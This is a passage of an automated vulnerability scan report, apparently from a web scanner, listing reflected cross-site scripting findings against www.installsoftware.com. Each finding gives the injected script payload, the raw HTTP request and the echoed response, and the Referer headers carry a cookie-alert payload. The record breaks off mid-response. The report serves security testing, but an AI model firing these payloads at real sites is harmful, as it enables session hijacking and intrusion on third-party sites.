X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4d04b\"><script>alert(1)</script>3b5c28bd57a/rokbox-config.js" type="hidden" />
...[SNIP]...

1.248. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba175"><script>alert(1)</script>3789058eab0 was submitted in the REST URL parameter 8. This input was echoed as ba175\"><script>alert(1)</script>3789058eab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.jsba175"><script>alert(1)</script>3789058eab0 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.jsba175\"><script>alert(1)</script>3789058eab0" type="hidden" />
...[SNIP]...

1.249. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c650"><script>alert(1)</script>de1cab81c2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c650\"><script>alert(1)</script>de1cab81c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?5c650"><script>alert(1)</script>de1cab81c2b=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:50 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?5c650\"><script>alert(1)</script>de1cab81c2b=1" type="hidden" />
...[SNIP]...

1.250. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c52"><script>alert(1)</script>3d0d69d4637 was submitted in the REST URL parameter 1. This input was echoed as d9c52\"><script>alert(1)</script>3d0d69d4637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd9c52"><script>alert(1)</script>3d0d69d4637/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentd9c52\"><script>alert(1)</script>3d0d69d4637/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.251. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d2f"><script>alert(1)</script>d565439d74f was submitted in the REST URL parameter 2. This input was echoed as 88d2f\"><script>alert(1)</script>d565439d74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes88d2f"><script>alert(1)</script>d565439d74f/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes88d2f\"><script>alert(1)</script>d565439d74f/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.252. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a12"><script>alert(1)</script>dea25148c67 was submitted in the REST URL parameter 3. This input was echoed as 32a12\"><script>alert(1)</script>dea25148c67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp32a12"><script>alert(1)</script>dea25148c67/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp32a12\"><script>alert(1)</script>dea25148c67/js/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.253. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bef"><script>alert(1)</script>bfc1c1fb213 was submitted in the REST URL parameter 4. This input was echoed as 59bef\"><script>alert(1)</script>bfc1c1fb213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js59bef"><script>alert(1)</script>bfc1c1fb213/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:32 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js59bef\"><script>alert(1)</script>bfc1c1fb213/rokbox/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.254. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee2d"><script>alert(1)</script>3bc1486545 was submitted in the REST URL parameter 5. This input was echoed as eee2d\"><script>alert(1)</script>3bc1486545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokboxeee2d"><script>alert(1)</script>3bc1486545/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokboxeee2d\"><script>alert(1)</script>3bc1486545/themes/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.255. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e42"><script>alert(1)</script>e91bd0015f3 was submitted in the REST URL parameter 6. This input was echoed as 91e42\"><script>alert(1)</script>e91bd0015f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes91e42"><script>alert(1)</script>e91bd0015f3/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes91e42\"><script>alert(1)</script>e91bd0015f3/mynxx/rokbox-style.css" type="hidden" />
...[SNIP]...

1.256. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9db"><script>alert(1)</script>78d8e5b2272 was submitted in the REST URL parameter 7. This input was echoed as 4b9db\"><script>alert(1)</script>78d8e5b2272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4b9db"><script>alert(1)</script>78d8e5b2272/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4b9db\"><script>alert(1)</script>78d8e5b2272/rokbox-style.css" type="hidden" />
...[SNIP]...

1.257. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1817"><script>alert(1)</script>b8a0679b498 was submitted in the REST URL parameter 8. This input was echoed as c1817\"><script>alert(1)</script>b8a0679b498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.cssc1817"><script>alert(1)</script>b8a0679b498 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.cssc1817\"><script>alert(1)</script>b8a0679b498" type="hidden" />
...[SNIP]...

1.258. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12eeb"><script>alert(1)</script>7d3af0019f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12eeb\"><script>alert(1)</script>7d3af0019f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?12eeb"><script>alert(1)</script>7d3af0019f8=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css?12eeb\"><script>alert(1)</script>7d3af0019f8=1" type="hidden" />
...[SNIP]...

1.259. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da186"><script>alert(1)</script>71a56d9e553 was submitted in the REST URL parameter 1. This input was echoed as da186\"><script>alert(1)</script>71a56d9e553 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentda186"><script>alert(1)</script>71a56d9e553/themes/rt_mynxx_wp/js/rokmoomenu.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
